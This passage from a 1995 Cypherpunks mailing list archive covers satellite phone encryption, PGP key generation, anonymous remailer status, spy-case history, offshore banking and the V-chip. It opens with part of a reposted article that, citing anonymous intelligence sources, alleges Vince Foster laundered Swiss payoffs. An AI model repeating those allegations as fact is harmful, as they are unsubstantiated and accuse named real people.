knew exactly what to look for, finding his payoffs in the torrent of routine wire transfer data would be a hopeless task. Besides that, greed could explain a lot, if not Foster's then for whomever else he might have been playing bagman. The CIA source says Foster was not the only one in the White House under suspicion for peddling state secrets. All of which helps explain Foster's odd behavior before his death. He was a tough, smart trial attorney at the peak of power in Washington. Only 48 years old, he was in excellent health. Suddenly, according to the Fiske report, he couldn't sleep. He complained of heart palpitations and high blood pressure. His sister arranged for him to see a Washington psychiatrist, who later told the FBI he had been instructed not to take notes because Foster's depression was "directly related to highly sensitive and confidential matters" tied to his "top secret" government work. Foster never saw a shrink. Instead, about a week before he died, he hired a lawyer: high-powered DC criminal attorney and political fix-it man James Hamilton. Foster's wife claims his reason was the White House Travel Office controversy, which was expected to lead to congressional hearings. On the weekend of July 17 and 18, Foster drove with his wife to the eastern shore of Maryland to relax. By "coincidence", according to the Fiske report, so did Hubbell. They met at the posh estate of Michael Cardozo, head of Clinton's legal defense fund and son-in-law of prominent Democratic fund raiser Nathan Landau. Hubbell later claimed the weekend was a laid-back gathering of tennis and poolside chit-chat. But according to sources connected to the CIA, Justice Department and another intelligence agency, the meeting was under surveillance. The agenda? Heavy duty damage control. Foster was grilled. To whom else could the Swiss money be traced? How could the scandal be contained? Sorry. File too long. Maybe someone else can post rest. From stewarts at ix.netcom.com Mon Jul 31 01:58:18 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 31 Jul 95 01:58:18 PDT Subject: Sat phone permit "wire"taps Message-ID: <199507310855.BAA09829@ix7.ix.netcom.com> At 12:34 AM 7/28/95 -0400, John A. Limpert wrote: >Is there a technical reason why communications through these future >satellite systems couldn't be encrypted? I thought that all of these >systems were based on vocoders and digital transmission, just like >a secure telephone. There are four encryption issues - end-to-end, uplink, downlink, and call-control. End-to-end is generally your problem, but for typical satellite phone (like a typical cellphone), if it's not built-on, it's a pain to add on; at best you might get a phone with digital passthrough of some sort, so you can send raw bits without a modem. Uplink and downlink encryption would be real nice, if the carrier provided them; at best we'll probably see governments mandating access to session keys (which the satellites could be equipped to provide), with commercial market needs forcing some kind of encryption to prevent eavesdropping (especially on downlinks, of course.) The limits aren't technical. Call-control encryption is an interesting question - there'll certainly have to be authentication, and you probably won't see phone-credit-card numbers on the downlink, but you probably _will_ see cleartext set-ids on most services. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A At 10:33 AM 7/29/95 -0400, Robert Hettinga wrote: >At 3:04 AM 7/29/95, Joel McNamara wrote: >>Don't bother. Better to wait until it hits the video shelves then have a >>party and see who can find the most (of many) technical flaws and gaffs. >>Would be much more entertaining in that context. > >Agreed. In television interviews Ms. Bullock talks about how she's "on the >net all the time" while in further conversation it's clear that all she >does is hang out in AOL auditoria and chat-rooms, probably with some >net.flack at her elbow.... So good for her. I've spent most of the evening chatting on cypherpunks and cyberia rather than writing code.... Some recent survey found that 60% of time that average folks spend on the net is communications rather than information retrieval. I rather enjoyed the movie, though I did share the experience of being one of the two or three people in the theater laughing at various technical gaffes and/or in-jokes. Obviously, you can't take anything from Hollywood too seriously technically, but they did look at a few social issues related to computerisation, such as the isolation, computer addiction, lack of face-to-face relationships, difficulty in knowing what's real when everything's on the computer, vulnerability of society to computer problems, trustability of people who tell you that you can trust their computer security system for everything - even the government uses it! So they didn't look into them too deeply - they're Hollywood. That's not their job :-) Also, I like Sandra Bullock, and I think her acting pulled the movie together more than the script did. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A At 12:52 AM 7/31/95 -0700, rick hoselton wrote: > >>Different cases - the Walkers gave away information on how the Yankees were >>stealing Russian secrets, which the Russians patched up by encrypting. > >Really? Do you have a reference for this? I am interested. No refs, this is just memory of the news. There was an undersea cable north of Siberia somewhere that carried a lot of unencrypted military traffic, which US Submarines were eavesdropping on. I think Walker was the one who leaked it, and they started encrypting. Refs on the Walkers should be easy to find in the library; there were a couple of books. > >>The most current information on the Rosenbergs, gotten from decrypted Soviet >>communications and declassified US and ex-Soviet files, indicates that Ethel >>Rosenberg >>was probably innocent of spying, and Julius was spying but didn't give away >>any useful atomic secrets, and that the FBI probably knew at the time they >>had Ethel killed that she was innocent. > >WOW! Had them killed? They WERE tried and convicted, you know. Yes, with government-provided evidence, and with the government withholding inconvenient evidence. There was a story on KPFA radio in the last week or so covering an article on the Rosenbergs in some lefty magazine, probably The Nation, by a couple who have been strong supporters of them for years, and are now saying that "sorry, friends, it looks like Julius _was_ spying, though not atomically". #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show "The World War II codebreaking efforts known as Enigma and Purple" From rah at shipwright.com Mon Jul 31 04:21:21 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 31 Jul 95 04:21:21 PDT Subject: The Net (short movie review) Message-ID: At 4:59 AM 7/31/95, Bill Stewart wrote: >So good for her. I've spent most of the evening chatting on cypherpunks and >cyberia >rather than writing code.... Some recent survey found that 60% of time that >average folks spend on the net is communications rather than information >retrieval. I believe I wasn't clear. My point was that Ms. Bullock lives in AOL chat rooms and thinks it's the internet. Most of my time on the net is spent communicating (albiet badly) also. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From asb at nexor.co.uk Mon Jul 31 05:38:45 1995 From: asb at nexor.co.uk (Andy Brown) Date: Mon, 31 Jul 95 05:38:45 PDT Subject: your mail In-Reply-To: <9507311116.AA13350@all.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote: > I wrote: >> On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote: >> >>> How (specifically) do you know that this is true? Key generation is >>> very tricky stuf, and very subtle changes can have very profound impacts. >>> I doubt that Zimmerman's original was truly perfect at this either, but >>> how do we really know? >> >> Because I've succesfully run the primes that PGP generates through the >> primality tests in other mathematical packages, most notably Arjen >> Lenstra's FreeLIP package. The remaining steps to generating an RSA >> keypair are very easy to follow, and the result simple to check by >> verifying that the components PGP comes up with satisfy >> ed=1 mod(p-1)(q-1). rsagen.c is pretty easy to follow if anyone wants to >> check for themselves. > > But that doesn't guarantee there aren't weak keys at all. For example, > primes of the sort 2^N+1 would pass the primality tests and be very > weak keys. As I'm sure you know, PGP picks its primes by choosing a random starting point and testing each odd number upwards until it gets a probable prime. The random number generator used to seed this search is mixed using MD5 which gives a uniform 1/0 distribution. I'd hazard a guess that the chances of a start point having so many contiguous 1's as to be close to 2^N is so vanishingly small that it's more likely a non-prime would pass the probabalistic tests! I suppose if I were really paranoid I'd feed in fixed starting points for the search to MIT PGP and PGP 2.6.2 to make sure that they come out with the same keys. - - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQEVAwUBMBzOMCXfPV+WEQVdAQEs3Af/Qr1RSfgKw0lHSdo+3A59ZY/7cmw1voA3 6zrl1uAOxUfXVO36UPrSh5/lGHjGNW25FU4mckZ5qwhD9x8BEI3NemIddAtSrnbH tNxTD5+dUpYyiab4j9CKE9FTBsuY+TriyafFOMRBvjELYVgh0zhnS6GBb2ZVN3R5 J1B+qItB/kK2rvrPN+9tqXaH6/lleOquZxA4quoVGOKOmdOg/uWA9xme90NqjjzS ZbTKVSWEuqWvbaIvm3KexgH1/t9jIU7EcRbfoRWiFDQrW/ecvInW61J6kEGfVqPK RmjsoyDsYZJ11AqPaZLgVDLY8lmAN9qzaiUH785tVRQY/A5qQzLrkA== =sDbg -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Mon Jul 31 06:40:21 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Mon, 31 Jul 95 06:40:21 PDT Subject: "Codebreakers" on PBS In-Reply-To: <199507310932.CAA27798@netcom9.netcom.com> Message-ID: <0au49c1w165w@bwalk.dm.com> bart at netcom.com (Harry Bartholomew) writes: > For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show > "The World War II codebreaking efforts known as Enigma and Purple" If this is the rerun of the show Nova had in march 94, then I highly recommend it. I taped it and showed it to the undergrad class on computer security I taught that semester. The kids loved it. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From altitude at CIC.Net Mon Jul 31 06:48:30 1995 From: altitude at CIC.Net (Alex Tang) Date: Mon, 31 Jul 95 06:48:30 PDT Subject: building libraries In-Reply-To: <199507310521.WAA08413@ix4.ix.netcom.com> Message-ID: <199507311348.JAA04346@petrified.cic.net> On Mon Jul 31 01:25:04 1995: you scribbled... > > At 08:40 PM 7/28/95 -0400, Alex Tang wrote: > >> The answer is to have some non-USA entity build shareable full fledged > >> full powered crypto libraries and provide them for free for the rest of > >> the world and for all machines. > >Wouldn't there still be licensing issues to deal with (in the states at > >least)?? I'm sure RSA would claim that the package would be in violation > >of the licensing... > > If you did everything in an RSAREF-compatible manner, that would help; > I think somebody outside the US has written an RSAREF-clone. > Some problems include building programs that have generic-callout hooks > instead of crypto-specific hooks (so that they don't get bitten by ITAR), > while still maintaining reasonable efficiency and convenience. Yeah, this would work for everyone except commercial institutions within the states. They'd have to get a license agreement for RSA. ...alex... Alex Tang altitude at cic.net http://petrified.cic.net/~altitude CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer Viz-It!: Software Developer (Check out http://vizit.cic.net) UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500) Unofficial SSL/HTTPD FAQ: http://petrified.cic.net/~altitude/ssl/ssl.saga.html From raph at CS.Berkeley.EDU Mon Jul 31 06:50:46 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 31 Jul 95 06:50:46 PDT Subject: List of reliable remailers Message-ID: <199507311350.GAA26013@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.taylored.com This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp. hash"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"syrinx"} = " cpunk pgp reord mix post"; $remailer{"ford"} = " cpunk pgp"; $remailer{"hroller"} = " cpunk pgp hash mix cut ek"; $remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek"; $remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. 21 Apr 1995: The new version of premail (0.33) is out, with direct posting, perl5 and better MH support, and numerous bug fixes. Last ping: Mon 31 Jul 95 6:00:04 PDT remailer email address history latency uptime ----------------------------------------------------------------------- spook remailer at spook.alias.net ****+-****** 16:34 99.99% vishnu mixmaster at vishnu.alias.net **+*+-****** 16:39 99.95% gondolin mixmaster at gondolin.org -------* -++ 1:28:04 99.92% ford remailer at bi-node.zerberus.de -**-+-*.*-*# 46:06 99.86% ideath remailer at ideath.goldenbear.com .-.......- 13:23:04 99.84% vox remail at vox.xs4all.nl .--..-..-.. 23:22:24 99.99% bsu-cs nowhere at bsu-cs.bsu.edu #*** -****## 11:33 99.68% portal hfinney at shell.portal.com **** -****## 7:01 99.67% replay remailer at replay.com +*** ****** 15:31 99.32% alumni hal at alumni.caltech.edu **** -****## 7:38 99.17% rmadillo remailer at armadillo.com ++++-. ++.-+ 4:01:54 99.15% hacktic remailer at utopia.hacktic.nl **** ****** 16:41 98.62% crown mixmaster at kether.alias.net -+--- +---- 2:00:09 98.43% rebma remailer at rebma.mn.org +_.-..--..+ 23:31:28 97.97% extropia remail at extropia.wimsey.com ..--.---. 13:06:46 94.87% penet anon at anon.penet.fi -------- -** 4:39:15 91.60% hroller hroller at c2.org #*--+--* -+ 3:17:36 90.05% rahul homer at rahul.net ***++-*****# 10:25 99.99% syrinx syrinx at c2.org -- ----- - 5:03:24 88.62% mix mixmaster at remail.obscura.com ---+---- . 15:07:06 85.77% c2 remail at c2.org -----* -+ 3:59:22 85.39% flame remailer at flame.alias.net +++++ +++ 55:37 74.06% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From fc at all.net Mon Jul 31 07:43:38 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 07:43:38 PDT Subject: your mail In-Reply-To: Message-ID: <9507311434.AA25514@all.net> > As I'm sure you know, PGP picks its primes by choosing a random starting > point and testing each odd number upwards until it gets a probable > prime. The random number generator used to seed this search is mixed > using MD5 which gives a uniform 1/0 distribution. I'd hazard a guess > that the chances of a start point having so many contiguous 1's as to be > close to 2^N is so vanishingly small that it's more likely a > non-prime would pass the probabalistic tests! Well, not exactly random starting points. Starting points generated by user keystrokes with characteristics that may be analyzed so as to reduce the key space to a searchable size, starting points that are determined by a transformation of those keystroke sequences using an algorithm, starting points that are determined by an algorithm that uses a deterministic (albeit complex) algorithm which performs input and output based on timeslices and interrupt mechanisms and queues that may tend to alter the statistics of arrival times. > I suppose if I were really paranoid I'd feed in fixed starting points > for the search to MIT PGP and PGP 2.6.2 to make sure that they come out > with the same keys. The term paranoid is inappropriate in this context. Paranoia refers to an irrational fear, while I am expressing a rational concern over a system that has been taken over by a (partially) government funded university and which has not been properly verified. The history of cryptography (as they say) is (quite literally) littered with the dead bodies of people killed because somebody else thought a cryptosystem was good enough when it was not. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From danisch at ira.uka.de Mon Jul 31 07:46:27 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Mon, 31 Jul 95 07:46:27 PDT Subject: Sex & Crime TV filter Message-ID: <9507311424.AA01110@elysion.iaks.ira.uka.de> Yesterday I heard in the radio that someone in America has developed some device which darkens the TV screen if there is sex or crime on TV. Does anyone know whether this is true and how it works? Hadmut From sandfort at crl.com Mon Jul 31 07:57:21 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 31 Jul 95 07:57:21 PDT Subject: Zimmermann legal fund In-Reply-To: <199507310635.XAA25441@ix9.ix.netcom.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Sun, 30 Jul 1995, Bill Stewart wrote: > Aren't there some banks or similar companies that are world-wide, > but have US branches? I think SwissBankCorp or somebody like that > has an office in San Francisco; would it be possible for you to transfer > money to someone with an account there who's really in, say, Switzerland > or the UK or Hong Kong? Foreign representative offices have very limited powers under US banking law. In addition, they have to be as forthcoming with US authorities as do US banks. There is no greater privacy with them than with US banks doing the same sorts of transfers. They do make it a little easier to open Swiss or other offshore bank accounts because they can handle the identity verification stuff here, so you don't have to go there. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From sandfort at crl.com Mon Jul 31 08:15:44 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 31 Jul 95 08:15:44 PDT Subject: The Net (short movie review) In-Reply-To: <199507310856.BAA09839@ix7.ix.netcom.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Mon, 31 Jul 1995, Bill Stewart wrote: > I rather enjoyed the movie, though I did share the experience of being > one of the two or three people in the theater laughing at various technical > gaffes and/or in-jokes. Obviously, you can't take anything from Hollywood too > seriously technically, but they did look at a few social issues related to > computerisation, such as the isolation, computer addiction, lack of face-to-face > relationships, difficulty in knowing what's real when everything's on the > computer, > vulnerability of society to computer problems, trustability of people who > tell you > that you can trust their computer security system for everything - even the > government uses it! So they didn't look into them too deeply - they're > Hollywood. Got to agree with Bill here. Book, TV, movie, etc. stories are not about "what" they are about "what if." For our purposes, it was sufficient that THE NET plausibly created distrust in solutions provided by monolithic big brothers. A lot of elements echoed arguments about Clipper, this Alltel conspiracy stuff, secret back doors, manufactured justifications for government mandated or endorsed security programs, etc. Of course the nominal enemy was an evil corporation, but it, could certainly be read as something more. The "Praetorians" are taken right of history, and can only be interpreted as a governmental group. I hope the movie is very popular. It helps us by inducing healthy cynicism with a dash of paranoia. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From bailey at computek.net Mon Jul 31 08:15:45 1995 From: bailey at computek.net (Mike Bailey) Date: Mon, 31 Jul 95 08:15:45 PDT Subject: Zimmermann legal fund In-Reply-To: Message-ID: On Mon, 31 Jul 1995, Enzo Michelangeli wrote: > On Sun, 30 Jul 1995, Mike Bailey wrote: > > > > The US banking industry has gone to the dogs. The day a non-US bank offers > > > an account that can be accessed over the net will be the day I close my US > > > accounts. > > > > Interesting idea ... > > > > 1st question or thing I would want to be certain of is the stability of the > > currency of the realm so to speak. I wouldn't want to bank in a country that > > had a weak currencey (sp) or was subject to roller coaster economics. > > How could it be worse than with the U.S. of A.?? ;-) > > Seriously: you may bank in US Dollars (or other major currencies) in many > countries, including all the offshore banking centres. Limited amounts of > cash may be withdrawn using ATM dispensers, against a fee of two or three > USD per operation; for larger amounts, you may ask them to wire money by > SWIFT, Telex or bank drafts to other banks or genric payees. For such > operations, most large banks accept instructions by snail mail, and > sometimes by fax (if the customer signs a letter of indemnity exempting > the bank from liabilities in case of forgeries). Sadly, AFAIK no bank is > accepting digitally encrypted and signed e-mail instructions, and issuing > digitally encrypted and signed receipts. > I'm feel that this type of banking is just around the corner with the coming tidal wave of internet based commerce. My primary concern would be something along this senario ... I open an account with U.S. $$ in a foreign bank who uses francs (don't flame the denonimation or the choice this is just an exammple ;-) ... a month later the franc loses 20 % of it's value as compared to the U.S. dollar. If I close out my account would I not lose 20% of my money because when the money was deposited it was credited to the account in francs ... and when it is withdrawn it converted back to $$ at the current conversion rate ? Maybe this was answered in the previous reply if so call me *thick* if not call me *paranoid*. -Mike ************************************************************************** * Personal internet account, opinions and ideas do not reflect those * * of my employer * * Mike Bailey (hm)214-252-3915 * * email bailey at computek.net (wk)214-456-4510 * * * * "Remember you can tune a piano but you can't tuna fish -Joe Walsh" * * http://www.computek.net/public/bailey/ * ************************************************************************** From tcmay at sensemedia.net Mon Jul 31 09:00:19 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 31 Jul 95 09:00:19 PDT Subject: Ivy Bells, Smersh, and the Rosenbergs Message-ID: At 9:16 AM 7/31/95, Bill Stewart wrote: >At 12:52 AM 7/31/95 -0700, rick hoselton wrote: >> >>>Different cases - the Walkers gave away information on how the Yankees were >>>stealing Russian secrets, which the Russians patched up by encrypting. >> >>Really? Do you have a reference for this? I am interested. >No refs, this is just memory of the news. There was an undersea cable >north of Siberia somewhere that carried a lot of unencrypted military >traffic, which US Submarines were eavesdropping on. I think Walker was >the one who leaked it, and they started encrypting. Refs on the Walkers >should be easy to find in the library; there were a couple of books. There were at least 3 books, plus at least one t.v. miniseries, plus extensive media coverage. Until the Aldrich Ames case, this was about the most serious spying case in modern times. (It may or may not have been bigger than Ames, depending on the relative importance of "technical means" vs. "humint.") The undersea cable eavesdropping program was "Ivy Bells," and was revealed to the Sovs by Walker and his associates. I don't know if they also knew about via alternate sources. On the other issue, whether either or both of the Rosenbergs were spies, things have settled yet. Sudoplatov, in "Special Tasks," claims they were both spies. Others doubt it. (For you Bond fans, Sudoplatov headed up "Smersh." Russian for "Death to spies." Yes, it really existed, unlike, say "U.N.C.L.E.") On the issue of whether in the 1950s the U.S. government knew the Rosenbergs were spies, we have even less information. A trial was held and guilty verdict returned, but reasonable folks may disagree. My guess? Yes, they were probably spies. The Rosenbergs were certainly the Mumia Abu Jamals of their day. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From thresher!thad at netcom.com Mon Jul 31 09:24:29 1995 From: thresher!thad at netcom.com (Thaddeus J. Beier) Date: Mon, 31 Jul 95 09:24:29 PDT Subject: Sex & Crime TV filter Message-ID: <199507311602.JAA01170@thresher> Hadmut, There has been an ongoing debate about this, for several years. The way that it is supposed to work is that the TV broadcasters would include some kind of rating information in the vertical interval between frames, and the TV's that are sold after a certain date would interpret these rating signals to darken the screen during shots, or more likely, programs that are deemed inappropriate to the viewer. The idea would be that parents could program their tv's to permit some range of sex and/or violence, and thus could protect their children somewhat. The chip that interprets the content does it solely based on the rating information. This is the so-called "v-chip" (v for violence, I think, not for video) that you see in the press. I think that a more reasonable approach would be to sell a box that sits between the video signal source and the TV, or that is within the TV, that is connected to some private rating service. I think that any kind of mandated rating would be unlikely to meet the qualifications of most people. Besides, what I would really like to filter out, what I find to be incredibly violent to the minds of children, is commercial advertising. Private rating services could take care of these, easily, as well. The idea of boxes outside the TV is usually casually shot down as unworkable; that kids, with their infinite time, patience, cleverness, and guile, will find a way to bypass the box. I'd say that it's worth a try. And, if it will blank commercials (and pause your VCR during them, say) I think it will have tremendous revenues to enable research into a secure solution. One such secure solution would be that you would take your TV into a shop, and have the antenna connection modified, so that any tampering would be detected. Or have it done as a house call, whatever. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From sandfort at crl.com Mon Jul 31 09:40:18 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 31 Jul 95 09:40:18 PDT Subject: OFFSHORE BANKING (Re: Zimmermann legal fund) In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Mon, 31 Jul 1995, Mike Bailey wrote: > I open an account with U.S. $$ in a foreign bank who uses francs ... a month > later the franc loses 20 % of it's value as compared to the U.S. dollar. If I > close out my account would I not lose 20% of my money because when the money was > deposited it was credited to the account in francs ... and when it is withdrawn > it converted back to $$ at the current conversion rate ? If the account is denominated in francs, you take the hit. If it is denominated in dollars, you don't. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jlasser at rwd.goucher.edu Mon Jul 31 09:47:51 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Mon, 31 Jul 95 09:47:51 PDT Subject: Ivy Bells, Smersh, and the Rosenbergs In-Reply-To: Message-ID: On Mon, 31 Jul 1995, Timothy C. May wrote: > On the other issue, whether either or both of the Rosenbergs were spies, > things have settled yet. Sudoplatov, in "Special Tasks," claims they were > both spies. Others doubt it. > > (For you Bond fans, Sudoplatov headed up "Smersh." Russian for "Death to > spies." Yes, it really existed, unlike, say "U.N.C.L.E.") > > On the issue of whether in the 1950s the U.S. government knew the > Rosenbergs were spies, we have even less information. A trial was held and > guilty verdict returned, but reasonable folks may disagree. My guess? Yes, > they were probably spies. Hmm... the stuff that was from the "one-time pads" that were recently decrypted says it was fairly certain they were. So says Kahn. :) I'm not convinced that there was enough public information available for a reasonable conviction back in the 50's, but there seems to be now. > The Rosenbergs were certainly the Mumia Abu Jamals of their day. The Mumia case (something friends of mine are more than peripherally acquainted with) seems to be very much in doubt. Of course, they'll kill him anyway, probably. But I suggest reading E.L. Doctrow's essay on the subject from the NYT of several weeks (months? possibly) back. Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From nsb at nsb.fv.com Mon Jul 31 09:48:28 1995 From: nsb at nsb.fv.com (nsb at nsb.fv.com) Date: Mon, 31 Jul 95 09:48:28 PDT Subject: Zimmermann legal fund Message-ID: <9507311625.AB06469@ nsb.fv.com> At 3:24 PM 7/30/95 -0700, James A. Donald wrote: >If you insist that international transactions be mediated through >US banks, you are cutting your throat. I hope my mail didn't give the impression that we are "insisting" on this. It's a matter of technical expedience at the moment, that's all. Non-US sellers who really want to use FV can do so today IF they get a US bank account. Payout through non-US banks is definitely something we plan to do, but you can't build a business today on our plans for tomorrow, especially since we don't have a firm target date. One of the relatively easiest alternatives we have discussed is good old fashioned paper checks. We could *conceivably* (this is not a promise!) set up a system to pay non-US sellers by mailing them paper checks. This is a fairly expensive process, and we'd have to pass on the costs to the sellers in the form of a service charge for the mailing, and there would be postal delays, and there would be a delay waiting for your local bank to clear a US check. Is this appealing? -- Nathaniel From tcmay at sensemedia.net Mon Jul 31 10:15:52 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 31 Jul 95 10:15:52 PDT Subject: Sex & Crime TV filter Message-ID: Wow! I think Ted just hit on something that could be used to quickly derail the "V-chip": At 4:02 PM 7/31/95, Thaddeus J. Beier wrote: >The chip that interprets the content does it solely based on the rating >information. This is the so-called "v-chip" (v for violence, I think, >not for video) that you see in the press. ... >qualifications of most people. Besides, what I would really >like to filter out, what I find to be incredibly violent to the >minds of children, is commercial advertising. Private rating >services could take care of these, easily, as well. I agree, of course, about it not being the role of government/FCC/etc. to mandate such ratings, such chips, etc. However, to help derail this V-chip being mandated, what if we (I mean activists, writers of columns, etc.) "insisted" that _commercials_ be similarly labelled? "Yes, if violence and sex is to be "voluntarily rated," we think that commercial advertising ought to be similarly rated." It might be hard for the legislators to avoid the logic of this. Advertisers, fearing people would of course mute the commercials, would then quietly urge them to drop the whole idea. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From rah at shipwright.com Mon Jul 31 11:13:27 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 